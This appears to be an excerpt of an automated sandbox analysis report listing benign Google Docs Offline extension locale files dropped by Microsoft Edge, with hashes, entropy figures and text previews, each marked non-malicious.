                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1389
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1763
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):930
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):913
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):883
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                                                                Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):848
Entropy (8bit):4.494568170878587
Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):1425
Entropy (8bit):4.461560329690825
Encrypted:false
Malicious:false
Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):961
Entropy (8bit):4.537633413451255
Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):959
Entropy (8bit):4.570019855018913
Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):968
Entropy (8bit):4.633956349931516
Encrypted:false
Malicious:false
Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..
Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:JSON data
Category:dropped
Size (bytes):838
Entropy (8bit):4.4975520913636595
Encrypted:false
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1305
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                                MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                                SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                                SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                                SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):911
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                                MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                                SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                                SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                                SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):939
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                                MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                                SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
